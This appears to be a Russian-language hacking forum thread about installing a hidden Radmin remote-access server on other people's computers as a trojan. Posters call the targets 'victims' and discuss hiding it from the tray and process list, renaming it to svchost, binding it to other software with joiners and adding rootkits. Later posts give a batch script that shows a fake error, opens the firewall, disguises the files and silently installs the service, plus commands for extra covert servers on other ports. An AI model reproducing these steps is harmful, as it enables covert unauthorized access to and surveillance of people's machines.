У меня то все остальные функции работаю, даже могу закрыть открытые программы через Telnet. версию не знаю, установил скрытую версию радмина из этого форума.
Хмм... Я устанавливал обычный 2.2 Потом ручками почистил инсталл, переименоавывал сервис, менял порт... Т.е. скрытой установкой не пользовался. Ну попробую её установить, может действительно косяк.
Попробуй. У меня версия со скрытой установкой, даже в процессах не плится, без иконок. Прога супер, вот если бы еще с ее помощью через Telnet можно было запустить прогу самому, тоесть установить, было бы вообще супер. Дело в том что при входе на удаленный комп с обычным радмином меня палят по иконке в трее. Закинуть свою версию возможно, а вот как потом ее запустить не знаю. ее нужно одним нажатием запустить, что я и пытаюсь через Телнет. И ничего не получается. Попробуй ты, может у тебя выйдет.
Зачем еще в реестр лазить, если у меня и так прога нигде не палится. Мне просто ее нужно самому на чужом компе активировать, т.е. запустить.
Проверял на windows 2003 (3SP) не работает. Как вариант попробуйте 3-ую версию, или собрать свой. Также альтернативой можно использовать руткид.
подскажите плиз нубу т.е. мне : я тут одним трояном заинтересовался(radmin 3.2) faq и все прилагающееся прочитал но понял меньше половины разъясните плиз: 1. там два инсталера было один viewer второй server. так сервер у ся распаковывать или у жертвы.если у ся то жертве скидывать r_server.exe AdmDll.dll raddrv.dll правильно?2.как етот сервер настроить? 3.пасс где найти смотрел в топиках так они все нерабочие мож есть программа какая (тада как ей пользоваться! 4.объясните как инсталером объединить 2 программы чтоб жертва установила и софт(желаемый) и сервер ? 5.как и куда скрипты прописывать чтоб у жертвы не логилась прога и чтоб из треи исчезла!?ах да и чтоб неспрашивала жертвы у разрешение на взлом?
>2.как етот сервер настроить? конфиг. сохраняется в реестре... >3.пасс где найти смотрел в топиках так они все нерабочие мож есть программа какая >(тада как ей пользоваться! Вопрос не понял... >4.объясните как инсталером объединить 2 программы чтоб жертва установила и >софт(желаемый) и сервер ? Поищи джойнеры ... >5.как и куда скрипты прописывать чтоб у жертвы не логилась прога и чтоб из треи >исчезла!?ах да и чтоб неспрашивала жертвы у разрешение на взлом?
так куда прописывать етот список ключей? как сделать так чтоб жертва устанавливала прогу и сервер за одно для версии 3.2?
Сохрани в *.reg и запускай .... либо Пуск -> Выполнить => regedit.exe там поэксперементируй ... хоть появится представление работы с реестром
regedit.exe это в компе жертвы запускать надо или на своем? а как запускать чениб на компе жертвы?чета слышал про телнет,мож пояснит кто как его настроить и т.д. и т.п. сор за бестактный вопрос :список ключей в реестре сохранить в reg? а как?где он?наверняка я оч назойлив но один раз рассказав что где жать и больше не пришлось бы!
Теперь и у меня вопрос... стоит ли переплетать свой пак радмина 2.1 на более новый типа 3.2 ... меньше ли будет "палева"... (дружелюбны ли антивиры к этой версии?) да и накладок с конфигурацией не будет ли?.... по сути же то же самое ... пара dll , 1-а exe шка... + прописать настройки в реестр.. ?
в 3 версии видеодрайвер работает как-то по другому. Пробовал собрать под новую версию, получилась только передача файлов
что нужно прописать в телнете чтобы у жертвы в процессах не отображался r_server!? как заставить жертву запустить server без соц.инженирии?
причем тут telnet к радмину? если ты хочешь чтоб в процессах не было r_server просто переименуй его например в svchost
да я его даже настроить не могу ! скачал готовый пак тут же на форуме !он сам распаковывается в систем!проста в viewerе есть такая функция телнет я думал мож ей надо как то воспользоваться ?мож кто расскажет как такой архивчик создать и пасс свой поставить!пишите в личку плз! мож есть какие ниб другие способы проникнуть на комп (XP) кроме как троем?поделитесь!ну или хотя б че ниб предложите по сетевому хаку !
я так понял что нужно 4 файла : батник(111) такого сожержания в sfx архиве!: @echo off echo FATAL ERROR! PLEASE, WAIT TO CONTINUE... netsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE reg export "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" 123.reg reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe" copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll" copy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll" reg import 111.reg regedit /s 111.reg "%SYSTEMROOT%/svchost.exe" /install /silence "%SYSTEMROOT%/svchost.exe" /start а вот что в файле 111.reg? а исправьте чтоб етот архив после запуска сам и удаляся!расскажите что нужно сделать чтоб руткит вместе с radminом ставился может расскажете мне!
у меня была трабла: у человека на порту 4899 стоял r_server я закинул ему еще два переименованых радмин сервера переименованых в svchost работающих на 4898 и 4897 портах настроил эти два через командную строку путем следующих команд: %SYSTEMROOT%/help\svchost.exe /install /silence %SYSTEMROOT%/help\svchost.exe /port:4898 /pass:tratata /save /silence %SYSTEMROOT%/help\svchost.exe /start и %SYSTEMROOT%/config\svchost.exe /install /silence %SYSTEMROOT%/config\svchost.exe /port:4897 /pass:tratata /save /silence %SYSTEMROOT%/config\svchost.exe /start в каждую директорию закидывал три файла: svchost.exe AdmDll.dll raddrv.dll собственно сама проблема с серверами на портах 4898 и 4897: через обмен файлов и телнет конектилось отлично но "управление" и "просмотр" не работали. после ввода пароля появлялась заставочка как при загрузке экрана и потом просто исчезала версия сервера 2.2 версия клиента 3.2 при этом на 4899 портустоит такая точно 2.2 версия и она нормально работает как думаете в чем может быть проблема? з.ы. а сегодня сервера работать перестали ( видимо ктото спалил их нодом ( содержание файла 111.reg факю по файлам бат и рег в первых двух постах этой темы чтобы файлы удалялись прописываешь в бат файле в конце: где xxx.xx название файла который надо удалить лично у меня бат файл был следующего содержания:
попробуй так: в файлике 111.bat пипешь строку: xxx.xx где xxx.xx - имя файла который надо запустить. например install.exe
